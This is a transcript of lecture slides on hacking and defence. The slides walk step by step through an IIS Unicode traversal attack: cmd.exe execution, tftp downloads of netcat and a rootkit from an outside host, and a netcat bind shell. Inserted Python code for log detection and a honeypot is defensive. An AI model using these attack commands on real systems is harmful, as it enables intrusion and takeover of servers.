Software Security - PowerPoint PPT Presentation

About This Presentation
Title:

Software Security

Description:

Point of Contact Search ARIN using email address from Domain Query will ... of the target networks IP address range. ARIN Database Search gives every IP ... – PowerPoint PPT presentation

Slides: 29
Provided by: CSS6
Transcript and Presenter's Notes



1
Software Security Hacking
  • Dan Guerndt
  • guerndtd_at_uwplatt.edu

2
Outline
  • Types of Hackers
  • The Hacker you don't want to be up against
  • Information needed by a Hacker
  • Tools needed by a Hacker
  • WhoIs Databases
  • Social Engineering
  • Example of Breaking Into a System
  • Defensive Measures
  • How the Law deals with Hacking

3
Introduction
  • Why learn how to hack?
  • A good offense is the best defense
  • Think like a hacker to learn what they need and use
  • Use hacking techniques to find entry points into your own
    system
  • Know the defensive measures to take against attackers

4
Types of Hackers
  • Three-tier pyramid
    • Cream of the crop: IQs that boil water; can write
      scripts and tools; can find vulnerabilities
    • IT savvy
    • Script kiddies: easiest to get caught; fire off
      scripts/programs until something works
  • All of them are very dangerous

5
Typical Hacker you don't want to be up against
  • Unlimited patience
    • Sometimes it can take a long time to crack a
      system
    • Waits for the administrator to back up the system
  • Planned attack
    • Extensive research
    • Doesn't take easy approaches (they may be traps)
  • Social engineer
  • Only uses the most stealthy approaches

6
Information needed by a Hacker
  • Domain Name
  • IP Address
  • Operating System Version Number
  • Open Ports
  • Knowledge of IDS/Firewalls
  • Vulnerabilities
  • System Admin's Name/Contact

7
Tools needed by a Hacker
  • WhoIs Databases
  • Port Scanning Program(s)
  • NetCat (the "Swiss Army Knife")
  • Nmap
  • Nslookup
  • RootKit
  • Vulnerability Databases or extreme knowledge

8
WhoIs Databases
  • Types of queries:
  • Registrar: the attacker must first find the correct
    registrar (http://www.internic.net/whois.html)
  • Domain: gets the domain name, admin contact and DNS
    server info
  • Network: gets the specific network blocks that the
    organization owns (http://www.arin.net)
  • Point of Contact: searching ARIN using the email
    address from the Domain query will sometimes
    reveal more domains that the attacker did not know
    about

9
Social Engineering
  • Attacker acts like he/she belongs
  • I LOVE YOU virus
  • Attacker that goes to HQ
  • Interview Example
  • Women

10
Breaking into a System: Step 1
  • Find the target's web page
  • Do a port scan on the target's web server
  • Nmap, Netcat, Nslookup
  • Nslookup the web site
  • http://www.kloth.net/services/nslookup.php
  • Gives the IP address

11
Breaking Into a System: Step 2
  • Need the rest of the target network's IP address
    range
  • ARIN Database Search gives every IP
  • Nmap gives only IPs with open ports
  • One-time ACK/SYN

      nmap -sP 208.37.215.0/24
      Interesting ports on 208.37.215.233:
      (The 1529 ports scanned but not shown below are in state: closed)
      Port     State   Service
      21/tcp   open    ftp
      22/tcp   open    ssh
      23/tcp   open    telnet
      79/tcp   open    finger
      80/tcp   open    http
      143/tcp  open    imap2
      Nmap run completed -- 256 IP addresses (1 host up) scanned in 360 seconds

12
Breaking into a System: Step 3
  • Don't want to use Nmap for OS guessing
  • Use Telnet instead
  • Most web servers announce their server software
    version in the HTTP response, which reveals the
    operating system

13
Step 3 (Continued)

      telnet 208.37.215.233 80
      Trying 208.37.215.233...
      Connected to 208.37.215.233.
      Escape character is '^]'.
      HEAD / HTTP/1.0

      HTTP/1.1 200 OK
      Server: Microsoft-IIS/4.0
      Date: Fri, 16 Feb 2001 18:45:23 GMT
      Content-Length: 526
      Content-Type: text/html

      Connection closed by foreign host.

  • Now have to find vulnerabilities for Windows NT
    4.0 and IIS 4.0

14
Breaking Into a System Step 4
  • As a rule of thumb, the latest vulnerabilities
    are often the least defended against
  • After finding vulnerabilities, attacker will
    exploit them
  • This example uses the IIS Unicode bug (a directory
    traversal flaw)

15
Step 4 (Continued)

      telnet 208.37.215.233 80
      Trying 208.37.215.233...
      Connected to 208.37.215.233.
      Escape character is '^]'.
      GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+echo+test+message>test.msg

      HTTP/1.1 200 OK
      Server: Microsoft-IIS/4.0
      Date: Fri, 16 Feb 2001 19:20:32 GMT
      Content-Length: 0
      Content-Type: text/plain

      Connection closed by foreign host.

  • Seems to have worked: no error, but must double
    check

      GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+type+test.msg

  • This GET displays the file created above
  • We now have the ability to read and write on the
    server

16
Breaking Into a System: Step 5
  • Attacker must download 2 programs onto the target
    system
    • RootKit
    • NetCat, to open our own ports
  • Since Windows NT does not support passive FTP,
    the attacker must use TFTP (Trivial File Transfer
    Protocol)

      GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+-i+216.240.45.60+GET+nc.exe

17
Step 5 (Continued)
  • Download NetCat

      GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+-i+216.240.45.60+GET+NetCat.exe

  • Download RootKit

      GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+-i+216.240.45.60+GET+RootKit.exe

18
Step 5 (Continued)
  • Attacker must issue a Netcat command to bind a
    port for the attacker's use

      GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+nc.exe+-l+-p+100+-t+-e+cmd.exe

  • Binds a listener for the attacker on port 100 (must
    use a port not currently in use on the target system)

19
Step 5 (Continued)

      telnet 208.37.215.233 100
      Trying 208.37.215.233...
      Connected to 208.37.215.233.
      Escape character is '^]'.
      C:\winnt\system32>

  • Now have system access and the attacker runs the
    Rootkit
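Seen from the defender's side, the requests in Steps 4 and 5 leave a distinctive trail in the web server log. The following is an added example of mine, not code from the presentation: a small Python analyzer that reproduces the lenient decoding behind the Unicode bug (so you can see the path the server actually resolved), then flags overlong encodings, escapes above the web root, cmd.exe invocations and tool downloads over a constructed IIS-style log. The log layout, the SAMPLE_LOG lines and the finding labels are my assumptions; only the request pattern and the two addresses come from the slides.

```python
import re
from typing import Dict, List

# Constructed sample log in a W3C-style IIS layout (assumption):
#   date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
# Lines 1-2 mirror the request pattern shown in the slides; the rest are made up.
SAMPLE_LOG = """\
2001-02-16 19:20:32 216.240.45.60 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+echo+test+message>test.msg 200
2001-02-16 19:25:11 216.240.45.60 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp+-i+216.240.45.60+GET+nc.exe 200
2001-02-16 19:26:02 10.0.0.5 GET /index.html - 200
2001-02-16 19:26:40 10.0.0.7 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404
2001-02-16 19:27:15 10.0.0.9 GET /images/logo.gif - 200
"""

_PCT = re.compile(r"%([0-9A-Fa-f]{2})")
# Two-byte overlong UTF-8 forms: lead byte C0 or C1 plus a continuation byte.
_OVERLONG = re.compile(r"%c[01]%[89ab][0-9a-f]", re.IGNORECASE)
_TOOLS = re.compile(r"\b(tftp|nc\.exe|netcat)\b", re.IGNORECASE)


def percent_decode(raw: str) -> bytes:
    """Turn %XX escapes into raw bytes without interpreting them yet."""
    out = bytearray()
    i = 0
    while i < len(raw):
        m = _PCT.match(raw, i)
        if m:
            out.append(int(m.group(1), 16))
            i = m.end()
        else:
            out.extend(raw[i].encode("latin-1", "replace"))
            i += 1
    return bytes(out)


def lenient_utf8_decode(data: bytes) -> str:
    """Mimic the permissive decoder behind the Unicode bug: a C0/C1 lead byte
    followed by a continuation byte is accepted although it is an overlong
    (invalid) encoding, so %c1%9c becomes '\\' and %c0%af becomes '/'.
    A strict decoder rejects these; this shows the path the server saw."""
    chars = []
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            chars.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            chars.append(chr(b))
            i += 1
    return "".join(chars)


def escapes_root(path: str) -> bool:
    """True if '..' segments climb above the virtual root once both slash
    styles are normalised (the traversal check the vulnerable decoder skipped)."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            if depth == 0:
                return True
            depth -= 1
        elif seg not in ("", "."):
            depth += 1
    return False


def analyze_request(stem: str, query: str) -> List[str]:
    """Return the finding labels (assumed names) that apply to one request."""
    findings = []
    if _OVERLONG.search(stem):
        findings.append("overlong-utf8")
    decoded = lenient_utf8_decode(percent_decode(stem))
    if escapes_root(decoded):
        findings.append("traversal")
    if decoded.lower().endswith("cmd.exe"):
        findings.append("command-shell")
    if _TOOLS.search(query):
        findings.append("tool-download")
    return findings


def scan_log(text: str) -> List[Dict]:
    """Scan a log in the assumed layout; one dict per suspicious request."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) != 7:
            continue  # not in the expected layout; skip rather than guess
        _date, _time, client, _method, stem, query, status = parts
        findings = analyze_request(stem, "" if query == "-" else query)
        if findings:
            hits.append({
                "line": n,
                "client": client,
                "status": int(status),
                "path_seen_by_server": lenient_utf8_decode(percent_decode(stem)),
                "findings": findings,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']} from {hit['client']} "
              f"(HTTP {hit['status']}): {hit['path_seen_by_server']} "
              f"-> {', '.join(hit['findings'])}")
```

Note that line 4 of the sample, a plain `../..` attempt that IIS itself rejected with a 404, is still flagged: the status code tells you whether the attempt worked, the findings tell you that someone is trying, which is the "sets a flag" behaviour the IDS slide describes.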

20
Defending against Hackers
  • Patch (#1 defense)
  • Check for updates daily
  • Vendors should correct mistakes quickly
  • Be aware of vulnerabilities that are not yet
    protected against
  • If the attacker cannot find a vulnerability on the
    Internet, the attacker would have to discover a
    new, unknown vulnerability not yet released to the
    public

21
Defending (Continued)
  • Firewall
    • The fewer open ports the better
    • Fewer vulnerability targets
  • IDS (intrusion detection system)
    • Finds abnormal traffic, but usually does not stop
      it
    • Sets a flag
    • Very hard for attackers to detect
    • Works internally and externally
    • Can be completely passive

22
Defending (Continued)
  • Do not release revealing information
  • Watch what is in the WhoIs databases
  • Be careful what info is released on company
    websites
  • Attackers will often give up if the info cannot
    be found
  • Be careful what is shown at the company site
  • Servers should not be on public display
  • No toy penguins!

23
Defending (Continued)
  • 70% of all attacks are done by employees
  • If an employee plants malicious code before
    leaving, he/she may have a backdoor
  • Full audit!
  • Time and money
  • All code must be documented properly
  • Model diagrams also help to compare with the written
    code

24
Defending (Continued)
  • Set up a trap
  • Leave open an obvious easy entry point
  • Do not use the entry point at all
  • Flag every occurrence of its use
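The trap described on this slide (an entry point nobody legitimate ever uses, where every use raises a flag) is in effect a single-port honeypot. As an added example that is not part of the presentation, here is a minimal one in Python using only the standard library: it listens on a port, records every connection with its source address and first bytes, answers with a bait prompt so the port looks like a real service, and formats an alert line. The host, the ephemeral port, the `login:` bait and the `probe_trap` client are my assumptions for a local demonstration.

```python
import socket
import socketserver
import threading
import time
from datetime import datetime, timezone
from typing import Dict, List, Optional


class _TrapHandler(socketserver.BaseRequestHandler):
    """Every connection to the trap is an alert: nothing legitimate
    should ever talk to this port."""

    def handle(self) -> None:
        self.request.settimeout(2.0)
        try:
            payload = self.request.recv(256)  # first bytes only, for the alert
        except (socket.timeout, OSError):
            payload = b""
        event = {
            "time": datetime.now(timezone.utc).isoformat(),
            "peer": self.client_address[0],
            "peer_port": self.client_address[1],
            "payload": payload,
        }
        with self.server.lock:
            self.server.events.append(event)
        # Bait prompt (assumed wording) so a scanner sees a plausible service.
        try:
            self.request.sendall(b"login: ")
        except OSError:
            pass


class TrapServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, host: str = "127.0.0.1", port: int = 0) -> None:
        # port 0 lets the OS pick a free port; a real trap would use a fixed,
        # believable port that no legitimate service is bound to.
        super().__init__((host, port), _TrapHandler)
        self.events: List[Dict] = []
        self.lock = threading.Lock()
        self._thread: Optional[threading.Thread] = None

    def start(self) -> int:
        """Serve in a background thread; return the bound port."""
        self._thread = threading.Thread(target=self.serve_forever, daemon=True)
        self._thread.start()
        return self.server_address[1]

    def stop(self) -> None:
        self.shutdown()
        self.server_close()

    def wait_for_events(self, count: int, timeout: float = 3.0) -> List[Dict]:
        """Block until at least `count` connections were recorded (or timeout)."""
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            with self.lock:
                if len(self.events) >= count:
                    return list(self.events)
            time.sleep(0.02)
        with self.lock:
            return list(self.events)


def alert_line(event: Dict) -> str:
    """One-line alert suitable for a log file or a pager."""
    preview = event["payload"][:32].decode("ascii", "replace").strip()
    return (f"TRAP {event['time']} src={event['peer']}:{event['peer_port']} "
            f"first_bytes={preview!r}")


def probe_trap(port: int, payload: bytes = b"HELLO\r\n",
               host: str = "127.0.0.1") -> bytes:
    """Client side, used only to demonstrate the trap against itself locally."""
    with socket.create_connection((host, port), timeout=2.0) as s:
        s.sendall(payload)
        return s.recv(64)


if __name__ == "__main__":
    trap = TrapServer()
    port = trap.start()
    probe_trap(port)
    for ev in trap.wait_for_events(1):
        print(alert_line(ev))
    trap.stop()
```

The point of the design is that the trap has no false positives by construction: because the port is never used for anything real, a single recorded event is enough to act on, which is what makes it cheaper to run than a general IDS.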

25
Law and Hacking
  • A conviction is often a felony
  • Good luck getting an IT job with a hacking
    conviction!
  • Fines and time spent in jail depend on the damage
    done
  • 5 years
  • $250,000 fine

26
Test your might!
  • www.hackthissite.org

27
Conclusion
  • All types of attackers are dangerous
  • Attackers need information and tools
  • Exposed server information should be hidden
  • Anything is penetrable, no matter how secure
  • Be wary of disgruntled employees and social
    engineering ploys
  • Patch frequently

28
References
  • [1] Ahmad, David R. Mirza; Russell, Ryan. Hack
    Proofing Your Network. Rockland: Syngress
    Publishing, Inc., 2002.
  • [2] McClure, Stuart; Scambray, Joel; Kurtz,
    George. Hacking Exposed: Network Security
    Secrets & Solutions. Fourth Edition. Berkeley:
    Nordin, 2003.
  • [3] Hack Proofing Your Web Applications: The Only
    Way to Stop a Hacker is to Think Like One.
    Rockland: Syngress Publishing, Inc., 2001.
  • [4] Chirillo, John. Hack Attacks Testing: How to
    Conduct Your Own Security Audit. Indianapolis:
    John Wiley & Sons, Inc., 2003.